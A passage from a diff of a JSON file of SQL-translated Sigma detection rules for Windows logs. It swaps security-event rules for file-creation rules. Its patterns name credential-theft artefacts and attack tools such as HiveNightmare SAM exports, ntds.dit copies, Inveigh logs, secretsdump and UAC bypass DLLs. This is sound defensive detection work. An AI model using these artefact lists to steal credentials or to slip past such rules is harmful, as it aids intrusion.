"attack.t1087.002" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", - "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "VSSAudit Security Event Source Registration", - "id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "status": "experimental", - "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." + "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND AuditSourceName = 'VSSAudit' AND EventID IN ('4904', '4905'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_vssaudit_secevent_source_registration.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "Security Event Log Cleared", - "id": "a122ac13-daf8-4175-83a2-72c387be339d", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "author": "Saw Winn Naung", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1070.001" + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" ], - "filename": "win_security_event_log_cleared.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "External Disk Drive Or USB Storage Device", - "id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", - "author": "Keith Wright", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ - "attack.t1091", - "attack.t1200", - "attack.lateral_movement", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '6416' AND ClassName = 'DiskDrive') OR DeviceDescription = 'USB Mass Storage Device'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" ], - "filename": "win_security_external_device.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "ISO Image Mount", - "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", - "status": "experimental", - "description": "Detects the mount of ISO images on an endpoint", - "author": "Syed Hasan (@syedhasan009)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "title": "ISO or Image Mount Indicator in Recent Files", + "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "status": "test", + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Software installation ISO files" + "Cases in which a user mounts an image file for legitimate reasons" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" ], - "filename": "win_security_iso_mount.yml" + "filename": "file_event_win_iso_file_recent.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], "falsepositives": [ - "Unknown" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "User Added to Local Administrators", - "id": "c265cf08-3f99-46c1-8d59-328247057d57", - "status": "stable", - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1078", - "attack.persistence", - "attack.t1098" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" ], - "filename": "win_security_user_added_to_local_administrators.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "EVTX Created In Uncommon Location", + "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "status": "experimental", + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", + "author": "D3F7A5105", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Web Browsers" + "Admin activity", + "Backup activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_create_evtx_non_common_locations.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' 